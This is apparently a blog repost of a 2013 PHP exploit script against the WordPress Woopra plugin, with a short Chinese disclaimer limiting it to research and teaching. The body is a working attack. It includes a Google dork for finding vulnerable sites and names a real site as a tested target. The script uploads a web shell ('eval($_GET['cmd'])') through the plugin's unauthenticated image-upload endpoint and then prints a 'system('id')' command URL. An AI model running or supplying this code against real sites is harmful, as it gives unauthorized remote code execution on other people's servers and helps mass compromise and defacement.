WordPress Woopra plugin remote PHP arbitrary code execution exploit.

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
  2. # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
  3. # Date: [06-10-2013]
  4. # Exploit Author: wantexz
  5. # Vendor Homepage:wordpress.org/plugins/woopra/
  6. # Software Link: wordpress.org/plugins/woopra
  7. # Version: woopra
  8. # Tested on: [wantexz]
  9. # CVE :
  10. # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
  11.  
  12.  
  13. ############################################################################################
  14. # INDONESIANCODER
  15. # by
  16. # WANTEXZ
  17. #
  18. ############################################################################################
  19.  
  20.  
  21. <?php
  22.  
  23. # woopra plugins ~ Exploit
  24. # http://indonesiancoder.com/
  25. #
  26.  
  27. echo <<<EOT
  28.  
  29. # -----------------------------------
  30. #/ woopra ~ Exploit \
  31. #\ Author: wantexz /
  32. # -----------------------------------
  33.  
  34. ################################################################################################
  35. # Author: WANTEXZ
  36. #
  37. # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
  38. # all indonesian coder, indonesian defacer, kill-9
  39. ,jatimcom , malangcyber
  40. #
  41. ################################################################################################
  42.  
  43. EOT;
  44.  
  45.  
  46. $options = getopt('u:f:');
  47.  
  48. if(!isset($options['u'], $options['f']))
  49. die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
  50. -u http://target.com/ The full path to Joomla!
  51. -f shell.php The name of the file to create.\n");
  52.  
  53. $url = $options['u'];
  54. $file = $options['f'];
  55.  
  56.  
  57. $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
  58. $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
  59.  
  60. $data ="<?php eval(\$_GET['cmd']); ?>";
  61. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
  62. rv:15.0) Gecko/20100101 Firefox/15.0.1',
  63. 'Content-Type: text/plain');
  64.  
  65.  
  66. echo " [+] Submitting request to: {$options['u']}\n";
  67.  
  68.  
  69. $handle = curl_init();
  70.  
  71. curl_setopt($handle, CURLOPT_URL, $url);
  72. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
  73. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  74. curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
  75.  
  76. $source = curl_exec($handle);
  77. curl_close($handle);
  78.  
  79.  
  80. if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
  81. @fopen($shell,'r'))
  82. {
  83. echo " [+] Exploit completed successfully!\n";
  84. echo " ______________________________________________\n\n
  85. {$shell}?cmd=system('id');\n";
  86. }
  87. else
  88. {
  89. die(" [+] Exploit was unsuccessful.\n");
  90. }
  91.  
  92. ?>
posted @ 2013-10-09 19:18  夏虫xm  阅读(351)  评论(0编辑  收藏  举报